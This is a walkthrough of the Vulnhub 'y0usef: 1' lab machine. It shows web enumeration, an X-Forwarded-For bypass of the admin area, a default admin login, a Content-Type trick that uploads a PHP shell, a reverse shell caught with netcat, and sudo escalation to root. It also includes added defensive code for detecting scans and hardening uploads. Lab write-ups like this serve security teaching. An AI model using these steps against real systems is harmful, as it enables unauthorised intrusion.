Vulnhub: Y0usef Target Machine Detailed Walkthrough
Y0usef
Author: jason_huawen
Basic target information
Name: y0usef: 1
Address:
https://www.vulnhub.com/entry/y0usef-1,624/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.62.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:66:82:69 1 60 PCS Systemtechnik GmbH
192.168.56.247 08:00:27:ca:39:d0 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host's IP address was identified as 192.168.56.247.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.247 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-06 21:36 EST
Nmap scan report for localhost (192.168.56.247)
Host is up (0.00018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d8:e0:99:8c:76:f1:86:a3:ce:09:c8:19:a4:1d:c7:e1 (DSA)
| 2048 82:b0:20:bc:04:ea:3f:c2:cf:73:c3:d4:fa:b5:4b:47 (RSA)
| 256 03:4d:b0:70:4d:cf:5a:4a:87:c3:a5:ee:84:cc:aa:cc (ECDSA)
|_ 256 64:cd:d0:af:6e:0d:20:13:01:96:3b:8d:16:3a:d6:1b (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Ubuntu)
MAC Address: 08:00:27:CA:39:D0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.35 seconds
The NMAP scan shows that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ curl http://192.168.56.247
<html>
<head>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" integrity="sha384-TX8t27EcRE3e/ihU7zmQxVncDAy5uIKz4rEkgIXeMed4M0jlfIDPvg6uqKI2xXr2" crossorigin="anonymous">
<body>
<div class="container-fluid">
<center class="mt-5">
<h1>Sorry , the site is under construction soon, it run </h1>
</center>
</div>
</body>
<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-ho+j7jyWK8fNQe+A12Hb8AhRq26LrZ/JpcUGGOn+Y7RsweNrtN/tE3MoK7ZeZDyx" crossorigin="anonymous"></script>
</head>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ curl http://192.168.56.247/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.10 (Ubuntu) Server at 192.168.56.247 Port 80</address>
</body></html>
Visiting port 80 in a browser returns the apache2 default page, and there is no robots.txt file, so the next step is a directory scan:
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ nikto -h http://192.168.56.247
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.247
+ Target Hostname: 192.168.56.247
+ Target Port: 80
+ Start Time: 2022-12-06 21:40:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.29
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2022-12-06 21:41:29 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/06 21:39:13 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 302]
Progress: 218995 / 220561 (99.29%)
===============================================================
2022/12/06 21:39:36 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2022/12/06 21:39:47 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 293]
/index.php (Status: 200) [Size: 791]
/.html (Status: 403) [Size: 294]
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/server-status (Status: 403) [Size: 302]
Progress: 1102787 / 1102805 (100.00%)
===============================================================
2022/12/06 21:41:55 Finished
===============================================================
So far no directories or files have been found. This may be because the default scan filters out some status codes, and the directories hidden behind those codes often require authentication. gobuster therefore needs to be told explicitly which status codes to report, to obtain more information:
200 (OK) The server successfully processed the request. Usually this means the server delivered the requested page.
204 (No Content) The server successfully processed the request but returned no content.
301 (Moved Permanently) The requested page has been moved permanently to a new location. When the server returns this response (to a GET or HEAD request), it automatically redirects the requester to the new location.
302 (Found, temporary move) The server is currently responding to the request with a page from a different location, but the requester should keep using the original location for future requests.
307 (Temporary Redirect) The server is currently responding to the request with a page from a different location, but the requester should keep using the original location for future requests.
401 (Unauthorized) The request requires authentication. For pages that require login, the server may return this response.
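The scans above send hundreds of thousands of requests, most of them answered with 404 or 403; that pattern is what a defender would look for in the Apache access log. The following detector is an added example and not part of the original walkthrough; the log lines are constructed and the thresholds are assumptions.

```python
import re
from collections import defaultdict

# Apache "combined" log format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"'
)

# Constructed sample log lines (not taken from the target machine).
SAMPLE_LOG = [
    '192.168.56.206 - - [06/Dec/2022:21:39:13 -0500] "GET /admin HTTP/1.1" 404 275 "-" "gobuster/3.3"',
    '192.168.56.206 - - [06/Dec/2022:21:39:13 -0500] "GET /backup HTTP/1.1" 404 275 "-" "gobuster/3.3"',
    '192.168.56.206 - - [06/Dec/2022:21:39:13 -0500] "GET /index.php HTTP/1.1" 200 791 "-" "gobuster/3.3"',
    '192.168.56.206 - - [06/Dec/2022:21:39:14 -0500] "GET /server-status HTTP/1.1" 403 302 "-" "gobuster/3.3"',
    '192.168.56.206 - - [06/Dec/2022:21:39:14 -0500] "GET /test HTTP/1.1" 404 275 "-" "gobuster/3.3"',
    '192.168.56.206 - - [06/Dec/2022:21:39:14 -0500] "GET /old HTTP/1.1" 404 275 "-" "gobuster/3.3"',
    '192.168.56.1 - - [06/Dec/2022:21:40:01 -0500] "GET / HTTP/1.1" 200 791 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [06/Dec/2022:21:40:02 -0500] "GET /index.php HTTP/1.1" 200 791 "-" "Mozilla/5.0"',
]

def parse(line):
    """Return the fields of one combined-format log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _ts, _method, path, status, ua = m.groups()
    return {"ip": ip, "path": path, "status": int(status), "ua": ua}

def find_enumeration(lines, min_requests=5, error_ratio=0.8):
    """Flag source IPs whose requests are mostly 403/404 (assumed thresholds)."""
    per_ip = defaultdict(lambda: {"total": 0, "errors": 0, "uas": set()})
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        s = per_ip[rec["ip"]]
        s["total"] += 1
        if rec["status"] in (403, 404):
            s["errors"] += 1
        s["uas"].add(rec["ua"])
    flagged = {}
    for ip, s in per_ip.items():
        if s["total"] >= min_requests and s["errors"] / s["total"] >= error_ratio:
            # A scanner User-Agent is corroborating evidence, not the trigger:
            # the ratio test still fires when the UA is changed to look like a browser.
            flagged[ip] = {
                "total": s["total"],
                "errors": s["errors"],
                "scanner_ua": any(u.startswith("gobuster") for u in s["uas"]),
            }
    return flagged

if __name__ == "__main__":
    print(find_enumeration(SAMPLE_LOG))
```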
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,401
Error: error on parsing arguments: status-codes ("200,204,301,302,307,401") and status-codes-blacklist ("404") are both set - please set only one. status-codes-blacklist is set by default so you might want to disable it by supplying an empty string.
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,401 --status-codes-blacklist ''
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 302,307,401,200,204,301
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/06 21:50:43 Starting gobuster in directory enumeration mode
===============================================================
Progress: 219246 / 220561 (99.40%)
===============================================================
2022/12/06 21:51:09 Finished
===============================================================
Still no directories were found, so the wordlist needs to be changed:
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -s 200,204,301,302,307,401 --status-codes-blacklist ''
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Status codes: 200,204,301,302,307,401
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/06 21:52:00 Starting gobuster in directory enumeration mode
===============================================================
/. (Status: 200) [Size: 791]
/adminstration (Status: 301) [Size: 324] [--> http://192.168.56.247/adminstration/]
Progress: 118867 / 119601 (99.39%)
===============================================================
2022/12/06 21:52:14 Finished
===============================================================
This time the /adminstration directory was found. Visiting it returns forbidden, which confirms the earlier guess, so scan its subdirectories next:
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247/adminstration/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -s 200,204,301,302,307,401 --status-codes-blacklist ''
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247/adminstration/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Status codes: 204,301,302,307,401,200
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/06 21:56:02 Starting gobuster in directory enumeration mode
===============================================================
/include (Status: 301) [Size: 332] [--> http://192.168.56.247/adminstration/include/]
/logout (Status: 301) [Size: 331] [--> http://192.168.56.247/adminstration/logout/]
/upload (Status: 301) [Size: 331] [--> http://192.168.56.247/adminstration/upload/]
/users (Status: 301) [Size: 330] [--> http://192.168.56.247/adminstration/users/]
/bootstrap (Status: 301) [Size: 334] [--> http://192.168.56.247/adminstration/bootstrap/]
Visiting these directories gives neither an error nor a forbidden response, just no content. Try adding an X-Forwarded-For header pointing at the local host to bypass the restriction: intercept the request with Burp Suite and add X-Forwarded-For: localhost.
Alternatively, when visiting /adminstration, the Firefox extension X-Forwarded-For Header can be used
to add a valid X-Forwarded-For header to the page requests; a login page is then returned.
Testing weak credentials shows that admin / admin works.
The next step is to get shell.php uploaded, but the server returns file not allowed, so a bypass is needed.
Intercepting the request with Burp Suite and changing the content-type to image/jpg works (image/jpeg does not).
The upload succeeds: file uploadad files/1670382468shell.php
Visiting that file gives a shell:
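Two weaknesses were chained above: the admin area decides "internal or not" from the client-supplied X-Forwarded-For header, and the uploader decides "image or not" from the client-supplied Content-Type. The code below is an added example, not the target's actual PHP; it reconstructs both checks as hypothetical Python functions next to hardened versions that rely only on server-side evidence (the TCP peer address, an extension allow-list and the file's magic bytes) and adds a detection rule for the spoofed header.

```python
import ipaddress

LOOPBACK = ipaddress.ip_network("127.0.0.0/8")
# Extension -> canonical type, and magic bytes -> canonical type (assumed allow-list)
CANON = {"jpg": "jpg", "jpeg": "jpg", "png": "png", "gif": "gif"}
MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png", b"GIF87a": "gif", b"GIF89a": "gif"}

def is_loopback(value):
    """True for 'localhost' or any 127.0.0.0/8 address; False for garbage."""
    value = value.strip()
    if value.lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(value) in LOOPBACK
    except ValueError:
        return False

def vulnerable_admin_allowed(headers, peer_ip):
    """Hypothetical reconstruction of the observed behaviour: X-Forwarded-For wins."""
    xff = headers.get("X-Forwarded-For")
    return is_loopback(xff.split(",")[0]) if xff else is_loopback(peer_ip)

def hardened_admin_allowed(headers, peer_ip):
    """Only the socket peer (REMOTE_ADDR) decides; the header is ignored
    unless a trusted reverse proxy terminated the connection (none here)."""
    return is_loopback(peer_ip)

def spoofed_forwarded_for(headers, peer_ip):
    """Detection rule: header claims loopback but the peer address is not loopback."""
    xff = headers.get("X-Forwarded-For")
    return bool(xff) and is_loopback(xff.split(",")[0]) and not is_loopback(peer_ip)

def vulnerable_upload_check(filename, content_type, data):
    """Hypothetical reconstruction: accepts exactly 'image/jpg', keeps the client's name."""
    return content_type == "image/jpg"

def sniff_type(data):
    """Canonical image type from the first bytes, or None if unknown."""
    return next((t for magic, t in MAGIC.items() if data.startswith(magic)), None)

def hardened_upload_check(filename, content_type, data):
    """Ignore Content-Type. Require an allow-listed extension that agrees with the
    magic bytes; return the verified type the server should use to name the file."""
    ext = filename.rsplit("/", 1)[-1].rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in CANON:
        return None
    sniffed = sniff_type(data)
    return sniffed if sniffed == CANON[ext] else None

# Constructed samples: a harmless PHP stub and a minimal JPEG/PNG header.
PHP_SAMPLE = b"<?php echo 'constructed sample'; ?>"
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 12
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
```

Store accepted files under a server-generated name with the verified extension, outside any directory where PHP executes, so even a mis-validated file is never interpreted.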
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.247] 55915
Linux yousef-VirtualBox 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:08:14 UTC 2014 i686 i686 i686 GNU/Linux
06:11:11 up 37 min, 0 users, load average: 0.00, 0.13, 0.49
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@yousef-VirtualBox:/$ ls
ls
bin cdrom etc initrd.img lost+found mnt proc run srv tmp var
boot dev home lib media opt root sbin sys usr vmlinuz
www-data@yousef-VirtualBox:/$ cd home
cd home
www-data@yousef-VirtualBox:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 3 root root 4.0K Dec 6 2020 .
drwxr-xr-x 22 root root 4.0K Nov 25 2020 ..
-rw-r--r-- 1 root root 53 Dec 8 2020 user.txt
drwxr-xr-x 18 yousef yousef 4.0K Dec 8 2020 yousef
www-data@yousef-VirtualBox:/home$ cat user.txt
cat user.txt
c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=
www-data@yousef-VirtualBox:/home$
Privilege escalation
The user.txt found under /home, next to yousef's home directory, is base64-encoded; decode it:
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ echo 'c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=' | base64 -d
ssh :
user : yousef
pass : yousef123
This gives user yousef's password; log in via ssh as that user:
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ ssh yousef@192.168.56.247
The authenticity of host '192.168.56.247 (192.168.56.247)' can't be established.
ED25519 key fingerprint is SHA256:J3OrMiuy5X+zdlTAYCltBBCNaN3bxTjPbQvtPR6QSzE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.247' (ED25519) to the list of known hosts.
yousef@192.168.56.247's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation: https://help.ubuntu.com/
778 packages can be updated.
482 updates are security updates.
Last login: Tue Dec 8 01:58:33 2020 from s
yousef@yousef-VirtualBox:~$ id
uid=1000(yousef) gid=1000(yousef) groups=1000(yousef),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
yousef@yousef-VirtualBox:~$ sudo -l
[sudo] password for yousef:
Matching Defaults entries for yousef on yousef-VirtualBox:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User yousef may run the following commands on yousef-VirtualBox:
(ALL : ALL) ALL
yousef@yousef-VirtualBox:~$ sudo /bin/bash
root@yousef-VirtualBox:~# cd /root
root@yousef-VirtualBox:/root# ls -alh
total 24K
drwx------ 2 root root 4.0K Dec 8 2020 .
drwxr-xr-x 22 root root 4.0K Nov 25 2020 ..
-rw------- 1 root root 235 Dec 8 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Feb 20 2014 .bashrc
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw-r--r-- 1 root root 105 Dec 8 2020 root.txt
root@yousef-VirtualBox:/root# cat root.txt
WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx
root@yousef-VirtualBox:/root#
This gives a root shell and the root flag.
Lessons learned
- The first intuition was correct: NMAP found only ports 22 and 80, so the entry point could only be port 80.
- If a regular directory scan returns nothing, consider whether status codes were filtered out, since some directories require authentication to be accessed; add the corresponding parameters so those results can appear, and also consider switching wordlists.
- The X-Forwarded-For extension can be used to add or modify that header in the browser.
- When bypassing file upload restrictions, observe closely how a normal, successful upload behaves; this time the content-type had to be changed to image/jpg, while image/jpeg did not upload.